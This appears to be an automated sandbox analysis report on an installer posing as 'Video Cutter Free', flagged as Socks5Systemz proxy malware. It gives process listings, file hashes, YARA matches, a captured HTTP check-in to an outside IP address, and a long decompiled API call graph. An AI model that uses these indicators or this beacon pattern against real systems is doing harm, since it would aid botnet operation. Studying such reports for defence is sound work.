                                                                            Data Ascii: 31e8b723c68ee18403c660fbfe0384c27b6bc8f80224cbd3bc190249f7e16fe04dde7674bb35c8d1e3f787aa0af0d9bf501d299b1ca2974d5f64cc496fc52d6db9c5fadb6f4c10302c3d41b1fdd313a1bd23292d5d0915749c97034f2d4034b6d166cccf71168bbf756a4efeb52aa7fc2cf3ff2f5d8ea4d0e8d5b9234ac34


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.549945188.119.66.1854436460C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-10 13:36:32 UTC291OUTGET /ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4ce71bc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad0388fd3d5965e HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Host: 188.119.66.185
                                                                            2024-12-10 13:36:33 UTC200INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 10 Dec 2024 13:36:33 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: PHP/7.4.33
                                                                            2024-12-10 13:36:33 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: e8b723663ec13250


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:08:34:20
                                                                            Start date:10/12/2024
                                                                            Path:C:\Users\user\Desktop\imMQqf6YWk.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\imMQqf6YWk.exe"
                                                                            Imagebase:0x400000
                                                                            File size:3'915'755 bytes
                                                                            MD5 hash:C9019CFC066B4CF4439AB3FA00AE3AC9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:1
                                                                            Start time:08:34:20
                                                                            Start date:10/12/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp" /SL5="$2042A,3667024,54272,C:\Users\user\Desktop\imMQqf6YWk.exe"
                                                                            Imagebase:0x400000
                                                                            File size:705'536 bytes
                                                                            MD5 hash:A0EB775B14D55062C7EB9F9226916FE8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.3874521806.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 3%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:3
                                                                            Start time:08:34:21
                                                                            Start date:10/12/2024
                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\system32\net.exe" pause video_cutter_free_12102
                                                                            Imagebase:0x1a0000
                                                                            File size:47'104 bytes
                                                                            MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:08:34:21
                                                                            Start date:10/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:08:34:22
                                                                            Start date:10/12/2024
                                                                            Path:C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe" -i
                                                                            Imagebase:0x400000
                                                                            File size:4'005'103 bytes
                                                                            MD5 hash:F00EE01B4436F8DD28084F015B123ECC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.2025991381.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000005.00000002.3874746180.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:6
                                                                            Start time:08:34:22
                                                                            Start date:10/12/2024
                                                                            Path:C:\Windows\SysWOW64\net1.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\net1 pause video_cutter_free_12102
                                                                            Imagebase:0x490000
                                                                            File size:139'776 bytes
                                                                            MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:21.2%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:2.5%
                                                                              Total number of Nodes:1463
                                                                              Total number of Limit Nodes:16
                                                                              execution_graph 4986 409c40 5027 4030dc 4986->5027 4988 409c56 5030 4042e8 4988->5030 4990 409c5b 5033 40457c GetModuleHandleA GetProcAddress 4990->5033 4994 409c65 5041 4065c8 4994->5041 4996 409c6a 5050 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4996->5050 5013 409d43 5112 4074a0 5013->5112 5015 409d05 5015->5013 5145 409aa0 5015->5145 5016 409d84 5116 407a28 5016->5116 5017 409d69 5017->5016 5018 409aa0 18 API calls 5017->5018 5018->5016 5020 409da9 5126 408b08 5020->5126 5024 409def 5025 408b08 35 API calls 5024->5025 5026 409e28 5024->5026 5025->5024 5155 403094 5027->5155 5029 4030e1 GetModuleHandleA GetCommandLineA 5029->4988 5032 404323 5030->5032 5156 403154 5030->5156 5032->4990 5034 404598 5033->5034 5035 40459f GetProcAddress 5033->5035 5034->5035 5036 4045b5 GetProcAddress 5035->5036 5037 4045ae 5035->5037 5038 4045c4 SetProcessDEPPolicy 5036->5038 5039 4045c8 5036->5039 5037->5036 5038->5039 5040 404624 6F541CD0 5039->5040 5040->4994 5169 405ca8 5041->5169 5051 4090f7 5050->5051 5331 406fa0 SetErrorMode 5051->5331 5056 403198 4 API calls 5057 40913c 5056->5057 5058 409b30 GetSystemInfo VirtualQuery 5057->5058 5059 409be4 5058->5059 5062 409b5a 5058->5062 5064 409768 5059->5064 5060 409bc5 VirtualQuery 5060->5059 5060->5062 5061 409b84 VirtualProtect 5061->5062 5062->5059 5062->5060 5062->5061 5063 409bb3 VirtualProtect 5062->5063 5063->5060 5341 406bd0 GetCommandLineA 5064->5341 5066 409825 5067 4031b8 4 API calls 5066->5067 5069 40983f 5067->5069 5068 406c2c 20 API calls 5071 409785 5068->5071 5072 406c2c 5069->5072 5070 403454 18 API calls 5070->5071 5071->5066 5071->5068 5071->5070 5073 406c53 GetModuleFileNameA 5072->5073 5074 406c77 GetCommandLineA 5072->5074 5075 403278 18 API calls 5073->5075 5078 406c7c 5074->5078 5076 406c75 5075->5076 5079 406ca4 5076->5079 5077 406c81 5080 403198 4 API calls 5077->5080 5078->5077 5081 406af0 18 API calls 5078->5081 5082 406c89 5078->5082 5083 403198 4 API calls 5079->5083 5080->5082 5081->5078 5085 40322c 4 API calls 5082->5085 5084 406cb9 5083->5084 5086 4031e8 5084->5086 5085->5079 5087 4031ec 5086->5087 5088 4031fc 5086->5088 5087->5088 5090 403254 18 API calls 5087->5090 5089 403228 5088->5089 5091 4025ac 4 API calls 5088->5091 5092 4074e0 5089->5092 5090->5088 5091->5089 5093 4074ea 5092->5093 5362 407576 5093->5362 5365 407578 5093->5365 5094 407516 5095 40752a 5094->5095 5368 40748c GetLastError 5094->5368 5099 409bec FindResourceA 5095->5099 5100 409c01 5099->5100 5101 409c06 SizeofResource 5099->5101 5102 409aa0 18 API calls 5100->5102 5103 409c13 5101->5103 5104 409c18 LoadResource 5101->5104 5102->5101 5107 409aa0 18 API calls 5103->5107 5105 409c26 5104->5105 5106 409c2b LockResource 5104->5106 5108 409aa0 18 API calls 5105->5108 5109 409c37 5106->5109 5110 409c3c 5106->5110 5107->5104 5108->5106 5111 409aa0 18 API calls 5109->5111 5110->5015 5142 407918 5110->5142 5111->5110 5113 4074b4 5112->5113 5114 4074c4 5113->5114 5115 4073ec 34 API calls 5113->5115 5114->5017 5115->5114 5117 407a35 5116->5117 5118 405890 18 API calls 5117->5118 5119 407a89 5117->5119 5118->5119 5120 407918 InterlockedExchange 5119->5120 5121 407a9b 5120->5121 5122 405890 18 API calls 5121->5122 5123 407ab1 5121->5123 5122->5123 5124 407af4 5123->5124 5125 405890 18 API calls 5123->5125 5124->5020 5125->5124 5130 408b82 5126->5130 5133 408b39 5126->5133 5127 408bcd 5476 407cb8 5127->5476 5129 408be4 5134 4031b8 4 API calls 5129->5134 5130->5127 5132 4034f0 18 API calls 5130->5132 5138 403420 18 API calls 5130->5138 5139 4031e8 18 API calls 5130->5139 5141 407cb8 35 API calls 5130->5141 5132->5130 5133->5130 5135 4031e8 18 API calls 5133->5135 5137 403420 18 API calls 5133->5137 5140 407cb8 35 API calls 5133->5140 5467 4034f0 5133->5467 5136 408bfe 5134->5136 5135->5133 5152 404c20 5136->5152 5137->5133 5138->5130 5139->5130 5140->5133 5141->5130 5502 4078c4 5142->5502 5146 409ac1 5145->5146 5147 409aa9 5145->5147 5149 405890 18 API calls 5146->5149 5148 405890 18 API calls 5147->5148 5150 409abb 5148->5150 5151 409ad2 5149->5151 5150->5013 5151->5013 5153 402594 18 API calls 5152->5153 5154 404c2b 5153->5154 5154->5024 5155->5029 5157 403164 5156->5157 5158 40318c TlsGetValue 5156->5158 5157->5032 5159 403196 5158->5159 5160 40316f 5158->5160 5159->5032 5164 40310c 5160->5164 5162 403174 TlsGetValue 5163 403184 5162->5163 5163->5032 5165 403120 LocalAlloc 5164->5165 5166 403116 5164->5166 5167 40313e TlsSetValue 5165->5167 5168 403132 5165->5168 5166->5165 5167->5168 5168->5162 5241 405940 5169->5241 5172 405280 GetSystemDefaultLCID 5175 4052b6 5172->5175 5173 404cdc 19 API calls 5173->5175 5174 40520c 19 API calls 5174->5175 5175->5173 5175->5174 5176 4031e8 18 API calls 5175->5176 5180 405318 5175->5180 5176->5175 5177 404cdc 19 API calls 5177->5180 5178 40520c 19 API calls 5178->5180 5179 4031e8 18 API calls 5179->5180 5180->5177 5180->5178 5180->5179 5181 40539b 5180->5181 5309 4031b8 5181->5309 5184 4053c4 GetSystemDefaultLCID 5313 40520c GetLocaleInfoA 5184->5313 5187 4031e8 18 API calls 5188 405404 5187->5188 5189 40520c 19 API calls 5188->5189 5190 405419 5189->5190 5191 40520c 19 API calls 5190->5191 5192 40543d 5191->5192 5319 405258 GetLocaleInfoA 5192->5319 5195 405258 GetLocaleInfoA 5196 40546d 5195->5196 5197 40520c 19 API calls 5196->5197 5198 405487 5197->5198 5199 405258 GetLocaleInfoA 5198->5199 5200 4054a4 5199->5200 5201 40520c 19 API calls 5200->5201 5202 4054be 5201->5202 5203 4031e8 18 API calls 5202->5203 5204 4054cb 5203->5204 5205 40520c 19 API calls 5204->5205 5206 4054e0 5205->5206 5207 4031e8 18 API calls 5206->5207 5208 4054ed 5207->5208 5209 405258 GetLocaleInfoA 5208->5209 5210 4054fb 5209->5210 5211 40520c 19 API calls 5210->5211 5212 405515 5211->5212 5213 4031e8 18 API calls 5212->5213 5214 405522 5213->5214 5215 40520c 19 API calls 5214->5215 5216 405537 5215->5216 5217 4031e8 18 API calls 5216->5217 5218 405544 5217->5218 5219 40520c 19 API calls 5218->5219 5220 405559 5219->5220 5221 405576 5220->5221 5222 405567 5220->5222 5224 40322c 4 API calls 5221->5224 5327 40322c 5222->5327 5225 405574 5224->5225 5226 40520c 19 API calls 5225->5226 5227 405598 5226->5227 5228 4055b5 5227->5228 5229 4055a6 5227->5229 5231 403198 4 API calls 5228->5231 5230 40322c 4 API calls 5229->5230 5232 4055b3 5230->5232 5231->5232 5321 4033b4 5232->5321 5234 4055d7 5235 4033b4 18 API calls 5234->5235 5236 4055f1 5235->5236 5237 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5236->5237 5238 40560b 5237->5238 5239 405cf4 GetVersionExA 5238->5239 5240 405d0b 5239->5240 5240->4996 5242 40594c 5241->5242 5249 404cdc LoadStringA 5242->5249 5245 4031e8 18 API calls 5246 40597d 5245->5246 5252 403198 5246->5252 5256 403278 5249->5256 5253 4031b7 5252->5253 5254 40319e 5252->5254 5253->5172 5254->5253 5305 4025ac 5254->5305 5261 403254 5256->5261 5258 403288 5259 403198 4 API calls 5258->5259 5260 4032a0 5259->5260 5260->5245 5262 403274 5261->5262 5263 403258 5261->5263 5262->5258 5266 402594 5263->5266 5265 403261 5265->5258 5267 402598 5266->5267 5269 4025a2 5266->5269 5272 401fd4 5267->5272 5268 40259e 5268->5269 5270 403154 4 API calls 5268->5270 5269->5265 5269->5269 5270->5269 5273 401fe8 5272->5273 5274 401fed 5272->5274 5283 401918 RtlInitializeCriticalSection 5273->5283 5276 402012 RtlEnterCriticalSection 5274->5276 5277 40201c 5274->5277 5278 401ff1 5274->5278 5276->5277 5277->5278 5290 401ee0 5277->5290 5278->5268 5281 402147 5281->5268 5282 40213d RtlLeaveCriticalSection 5282->5281 5284 40193c RtlEnterCriticalSection 5283->5284 5285 401946 5283->5285 5284->5285 5286 401964 LocalAlloc 5285->5286 5287 40197e 5286->5287 5288 4019c3 RtlLeaveCriticalSection 5287->5288 5289 4019cd 5287->5289 5288->5289 5289->5274 5293 401ef0 5290->5293 5291 401f1c 5295 401f40 5291->5295 5301 401d00 5291->5301 5293->5291 5293->5295 5296 401e58 5293->5296 5295->5281 5295->5282 5297 4016d8 LocalAlloc VirtualAlloc VirtualFree VirtualFree VirtualAlloc 5296->5297 5298 401e68 5297->5298 5299 401e75 5298->5299 5300 401dcc 9 API calls 5298->5300 5299->5293 5300->5299 5302 401d4e 5301->5302 5303 401d1e 5301->5303 5302->5303 5304 401c68 9 API calls 5302->5304 5303->5295 5304->5303 5306 4025b0 5305->5306 5307 4025ba 5305->5307 5306->5307 5308 403154 4 API calls 5306->5308 5307->5253 5307->5307 5308->5307 5310 4031be 5309->5310 5311 4031e3 5310->5311 5312 4025ac 4 API calls 5310->5312 5311->5184 5312->5310 5314 405233 5313->5314 5315 405245 5313->5315 5317 403278 18 API calls 5314->5317 5316 40322c 4 API calls 5315->5316 5318 405243 5316->5318 5317->5318 5318->5187 5320 405274 5319->5320 5320->5195 5322 4033bc 5321->5322 5323 403254 18 API calls 5322->5323 5324 4033cf 5323->5324 5325 4031e8 18 API calls 5324->5325 5326 4033f7 5325->5326 5328 403230 5327->5328 5329 403252 5328->5329 5330 4025ac 4 API calls 5328->5330 5329->5225 5330->5329 5339 403414 5331->5339 5334 406fee 5335 407284 FormatMessageA 5334->5335 5337 4072aa 5335->5337 5336 403278 18 API calls 5338 4072c7 5336->5338 5337->5336 5338->5056 5340 403418 LoadLibraryA 5339->5340 5340->5334 5348 406af0 5341->5348 5343 406bf3 5344 406c05 5343->5344 5345 406af0 18 API calls 5343->5345 5346 403198 4 API calls 5344->5346 5345->5343 5347 406c1a 5346->5347 5347->5071 5349 406b1c 5348->5349 5350 403278 18 API calls 5349->5350 5351 406b29 5350->5351 5358 403420 5351->5358 5353 406b31 5354 4031e8 18 API calls 5353->5354 5355 406b49 5354->5355 5356 403198 4 API calls 5355->5356 5357 406b6b 5356->5357 5357->5343 5359 403426 5358->5359 5361 403437 5358->5361 5360 403254 18 API calls 5359->5360 5359->5361 5360->5361 5361->5353 5363 407578 5362->5363 5364 4075b7 CreateFileA 5363->5364 5364->5094 5366 403414 5365->5366 5367 4075b7 CreateFileA 5366->5367 5367->5094 5371 4073ec 5368->5371 5372 407284 19 API calls 5371->5372 5374 407414 5372->5374 5373 407434 5383 405890 5373->5383 5374->5373 5380 405194 5374->5380 5377 407443 5378 403198 4 API calls 5377->5378 5379 407460 5378->5379 5379->5095 5387 4051a8 5380->5387 5384 405897 5383->5384 5385 4031e8 18 API calls 5384->5385 5386 4058af 5385->5386 5386->5377 5388 4051c5 5387->5388 5395 404e58 5388->5395 5390 4051f1 5393 403278 18 API calls 5390->5393 5394 4051a3 5393->5394 5394->5373 5398 404e73 5395->5398 5396 404e85 5396->5390 5400 404be4 5396->5400 5398->5396 5403 404f7a 5398->5403 5410 404e4c 5398->5410 5401 405940 19 API calls 5400->5401 5402 404bf5 5401->5402 5402->5390 5404 404f8b 5403->5404 5406 404fd9 5403->5406 5404->5406 5407 40505f 5404->5407 5409 404ff7 5406->5409 5413 404df4 5406->5413 5407->5409 5417 404e38 5407->5417 5409->5398 5411 403198 4 API calls 5410->5411 5412 404e56 5411->5412 5412->5398 5414 404e02 5413->5414 5420 404bfc 5414->5420 5416 404e30 5416->5406 5433 4039a4 5417->5433 5423 4059b0 5420->5423 5422 404c15 5422->5416 5425 4059be 5423->5425 5424 404cdc 19 API calls 5426 4059e8 5424->5426 5425->5424 5427 405194 33 API calls 5426->5427 5428 4059f6 5427->5428 5429 4031e8 18 API calls 5428->5429 5430 405a01 5429->5430 5431 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5430->5431 5432 405a1b 5431->5432 5432->5422 5434 4039ab 5433->5434 5439 4038b4 5434->5439 5436 4039cb 5437 403198 4 API calls 5436->5437 5438 4039d2 5437->5438 5438->5409 5440 4038d5 5439->5440 5441 4038c8 5439->5441 5443 403934 5440->5443 5444 4038db 5440->5444 5442 403780 6 API calls 5441->5442 5447 4038d0 5442->5447 5445 403993 5443->5445 5446 40393b 5443->5446 5448 4038e1 5444->5448 5449 4038ee 5444->5449 5454 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5445->5454 5450 403941 5446->5450 5451 40394b 5446->5451 5447->5436 5452 403894 6 API calls 5448->5452 5453 403894 6 API calls 5449->5453 5455 403864 23 API calls 5450->5455 5456 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5451->5456 5452->5447 5457 4038fc 5453->5457 5454->5447 5455->5447 5458 40395d 5456->5458 5459 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5457->5459 5460 403864 23 API calls 5458->5460 5462 403917 5459->5462 5461 403976 5460->5461 5464 40374c VariantClear 5461->5464 5463 40374c VariantClear 5462->5463 5465 40392c 5463->5465 5466 40398b 5464->5466 5465->5436 5466->5436 5468 4034fd 5467->5468 5475 40352d 5467->5475 5470 403526 5468->5470 5472 403509 5468->5472 5469 403198 4 API calls 5471 403517 5469->5471 5473 403254 18 API calls 5470->5473 5471->5133 5482 4025c4 5472->5482 5473->5475 5475->5469 5477 407cd3 5476->5477 5481 407cc8 5476->5481 5486 407c5c 5477->5486 5480 405890 18 API calls 5480->5481 5481->5129 5483 4025ca 5482->5483 5484 4025dc 5483->5484 5485 403154 4 API calls 5483->5485 5484->5471 5484->5484 5485->5484 5487 407caf 5486->5487 5488 407c70 5486->5488 5487->5480 5487->5481 5488->5487 5490 407bac 5488->5490 5491 407bb7 5490->5491 5492 407bc8 5490->5492 5494 405890 18 API calls 5491->5494 5493 4074a0 34 API calls 5492->5493 5495 407bdc 5493->5495 5494->5492 5496 4074a0 34 API calls 5495->5496 5497 407bfd 5496->5497 5498 407918 InterlockedExchange 5497->5498 5499 407c12 5498->5499 5500 407c28 5499->5500 5501 405890 18 API calls 5499->5501 5500->5488 5501->5500 5503 4078d6 5502->5503 5504 4078e7 5502->5504 5505 4078db InterlockedExchange 5503->5505 5504->5015 5505->5504 6096 409e47 6097 409e6c 6096->6097 6098 4098f4 29 API calls 6097->6098 6102 409e71 6098->6102 6099 409ec4 6130 4026c4 GetSystemTime 6099->6130 6101 409ec9 6103 409330 46 API calls 6101->6103 6102->6099 6105 408dd8 18 API calls 6102->6105 6104 409ed1 6103->6104 6106 4031e8 18 API calls 6104->6106 6107 409ea0 6105->6107 6108 409ede 6106->6108 6110 409ea8 MessageBoxA 6107->6110 6109 406928 19 API calls 6108->6109 6111 409eeb 6109->6111 6110->6099 6112 409eb5 6110->6112 6114 4066c0 19 API calls 6111->6114 6113 405864 19 API calls 6112->6113 6113->6099 6115 409efb 6114->6115 6116 406638 19 API calls 6115->6116 6117 409f0c 6116->6117 6118 403340 18 API calls 6117->6118 6119 409f1a 6118->6119 6120 4031e8 18 API calls 6119->6120 6121 409f2a 6120->6121 6122 4074e0 37 API calls 6121->6122 6123 409f69 6122->6123 6124 402594 18 API calls 6123->6124 6125 409f89 6124->6125 6126 407a28 19 API calls 6125->6126 6127 409fcb 6126->6127 6128 407cb8 35 API calls 6127->6128 6129 409ff2 6128->6129 6130->6101 6057 407548 6058 407554 CloseHandle 6057->6058 6059 40755d 6057->6059 6058->6059 6601 402b48 RaiseException 6060 407749 6061 4076dc WriteFile 6060->6061 6067 407724 6060->6067 6062 4076e8 6061->6062 6063 4076ef 6061->6063 6065 40748c 35 API calls 6062->6065 6064 407700 6063->6064 6066 4073ec 34 API calls 6063->6066 6065->6063 6066->6064 6067->6060 6069 4077e0 6067->6069 6068 4078db InterlockedExchange 6070 4078e7 6068->6070 6069->6068 6071 407890 6069->6071 6602 40294a 6603 402952 6602->6603 6604 403554 4 API calls 6603->6604 6605 402967 6603->6605 6604->6603 6606 403f4a 6607 403f53 6606->6607 6608 403f5c 6606->6608 6610 403f07 6607->6610 6613 403f09 6610->6613 6611 403f3c 6611->6608 6614 403154 4 API calls 6613->6614 6616 403e9c 6613->6616 6619 403f3d 6613->6619 6633 403e9c 6613->6633 6614->6613 6615 403ef2 6618 402674 4 API calls 6615->6618 6616->6611 6616->6615 6622 403ea9 6616->6622 6624 403e8e 6616->6624 6621 403ecf 6618->6621 6619->6608 6621->6608 6622->6621 6623 402674 4 API calls 6622->6623 6623->6621 6625 403e4c 6624->6625 6626 403e62 6625->6626 6627 403e7b 6625->6627 6629 403e67 6625->6629 6628 403cc8 4 API calls 6626->6628 6630 402674 4 API calls 6627->6630 6628->6629 6631 403e78 6629->6631 6632 402674 4 API calls 6629->6632 6630->6631 6631->6615 6631->6622 6632->6631 6634 403ed7 6633->6634 6640 403ea9 6633->6640 6635 403ef2 6634->6635 6637 403e8e 4 API calls 6634->6637 6638 402674 4 API calls 6635->6638 6636 403ecf 6636->6613 6639 403ee6 6637->6639 6638->6636 6639->6635 6639->6640 6640->6636 6641 402674 4 API calls 6640->6641 6641->6636 6131 403a52 6132 403a74 6131->6132 6133 403a5a WriteFile 6131->6133 6133->6132 6134 403a78 GetLastError 6133->6134 6134->6132 6135 402654 6136 403154 4 API calls 6135->6136 6138 402614 6136->6138 6137 402632 6137->6137 6138->6137 6139 403154 4 API calls 6138->6139 6139->6137 6650 405160 6651 405173 6650->6651 6652 404e58 33 API calls 6651->6652 6653 405187 6652->6653 5506 409e62 5507 409aa0 18 API calls 5506->5507 5508 409e67 5507->5508 5509 409e6c 5508->5509 5609 402f24 5508->5609 5543 4098f4 5509->5543 5512 409ec4 5548 4026c4 GetSystemTime 5512->5548 5514 409ec9 5549 409330 5514->5549 5515 409e71 5515->5512 5614 408dd8 5515->5614 5519 4031e8 18 API calls 5520 409ede 5519->5520 5567 406928 5520->5567 5521 409ea0 5523 409ea8 MessageBoxA 5521->5523 5523->5512 5525 409eb5 5523->5525 5617 405864 5525->5617 5530 409f0c 5594 403340 5530->5594 5532 409f1a 5533 4031e8 18 API calls 5532->5533 5534 409f2a 5533->5534 5535 4074e0 37 API calls 5534->5535 5536 409f69 5535->5536 5537 402594 18 API calls 5536->5537 5538 409f89 5537->5538 5539 407a28 19 API calls 5538->5539 5540 409fcb 5539->5540 5541 407cb8 35 API calls 5540->5541 5542 409ff2 5541->5542 5621 40953c 5543->5621 5548->5514 5563 409350 5549->5563 5552 409375 CreateDirectoryA 5553 4093ed 5552->5553 5554 40937f GetLastError 5552->5554 5555 40322c 4 API calls 5553->5555 5554->5563 5556 4093f7 5555->5556 5559 4031b8 4 API calls 5556->5559 5557 408dd8 18 API calls 5557->5563 5560 409411 5559->5560 5562 4031b8 4 API calls 5560->5562 5561 407284 19 API calls 5561->5563 5564 40941e 5562->5564 5563->5552 5563->5557 5563->5561 5566 405890 18 API calls 5563->5566 5713 406cf4 5563->5713 5736 409224 5563->5736 5755 404c94 5563->5755 5758 408da8 5563->5758 5564->5519 5566->5563 5868 406820 5567->5868 5570 403454 18 API calls 5571 40694a 5570->5571 5572 4066c0 5571->5572 5873 4068e4 5572->5873 5575 4066f0 5577 403340 18 API calls 5575->5577 5576 4066fe 5578 403454 18 API calls 5576->5578 5581 4066fc 5577->5581 5579 406711 5578->5579 5580 403340 18 API calls 5579->5580 5580->5581 5582 403198 4 API calls 5581->5582 5583 406733 5582->5583 5584 406638 5583->5584 5585 406642 5584->5585 5586 406665 5584->5586 5879 406950 5585->5879 5587 40322c 4 API calls 5586->5587 5589 40666e 5587->5589 5589->5530 5590 406649 5590->5586 5591 406654 5590->5591 5592 403340 18 API calls 5591->5592 5593 406662 5592->5593 5593->5530 5595 403344 5594->5595 5596 4033a5 5594->5596 5597 40334c 5595->5597 5598 4031e8 5595->5598 5597->5596 5600 4031e8 18 API calls 5597->5600 5603 40335b 5597->5603 5601 403254 18 API calls 5598->5601 5604 4031fc 5598->5604 5599 403228 5599->5532 5600->5603 5601->5604 5602 403254 18 API calls 5606 403375 5602->5606 5603->5602 5604->5599 5605 4025ac 4 API calls 5604->5605 5605->5599 5607 4031e8 18 API calls 5606->5607 5608 4033a1 5607->5608 5608->5532 5610 403154 4 API calls 5609->5610 5611 402f29 5610->5611 5885 402bcc 5611->5885 5613 402f51 5613->5613 5615 408da8 18 API calls 5614->5615 5616 408df4 5615->5616 5616->5521 5618 405869 5617->5618 5619 405940 19 API calls 5618->5619 5620 40587b 5619->5620 5620->5620 5628 40955b 5621->5628 5622 409590 5624 40959d GetUserDefaultLangID 5622->5624 5629 409592 5622->5629 5623 409594 5639 407024 GetModuleHandleA GetProcAddress 5623->5639 5624->5629 5627 40956f 5633 409884 5627->5633 5628->5622 5628->5623 5628->5627 5629->5627 5630 4095cb GetACP 5629->5630 5631 4095ef 5629->5631 5630->5627 5630->5629 5631->5627 5632 409615 GetACP 5631->5632 5632->5627 5632->5631 5634 40988c 5633->5634 5638 4098c6 5633->5638 5635 403420 18 API calls 5634->5635 5634->5638 5636 4098c0 5635->5636 5697 408e80 5636->5697 5638->5515 5640 407067 5639->5640 5641 40705e 5639->5641 5642 407070 5640->5642 5643 4070a8 5640->5643 5650 403198 4 API calls 5641->5650 5660 406f68 5642->5660 5645 406f68 RegOpenKeyExA 5643->5645 5648 4070c1 5645->5648 5646 407089 5647 4070de 5646->5647 5663 406f5c 5646->5663 5652 40322c 4 API calls 5647->5652 5648->5647 5651 406f5c 20 API calls 5648->5651 5654 407120 5650->5654 5655 4070d5 RegCloseKey 5651->5655 5656 4070eb 5652->5656 5657 403198 4 API calls 5654->5657 5655->5647 5666 4032fc 5656->5666 5659 407128 5657->5659 5659->5629 5661 406f73 5660->5661 5662 406f79 RegOpenKeyExA 5660->5662 5661->5662 5662->5646 5680 406e10 5663->5680 5667 403300 5666->5667 5668 40333f 5666->5668 5669 40330a 5667->5669 5672 4031e8 5667->5672 5668->5641 5670 403334 5669->5670 5671 40331d 5669->5671 5674 4034f0 18 API calls 5670->5674 5673 4034f0 18 API calls 5671->5673 5676 403254 18 API calls 5672->5676 5677 4031fc 5672->5677 5679 403322 5673->5679 5674->5679 5675 403228 5675->5641 5676->5677 5677->5675 5678 4025ac 4 API calls 5677->5678 5678->5675 5679->5641 5681 406e36 RegQueryValueExA 5680->5681 5682 406e7b 5681->5682 5685 406e59 5681->5685 5684 403198 4 API calls 5682->5684 5683 406e73 5686 403198 4 API calls 5683->5686 5687 406f47 RegCloseKey 5684->5687 5685->5682 5685->5683 5688 403278 18 API calls 5685->5688 5689 403420 18 API calls 5685->5689 5686->5682 5687->5647 5688->5685 5690 406eb0 RegQueryValueExA 5689->5690 5690->5681 5691 406ecc 5690->5691 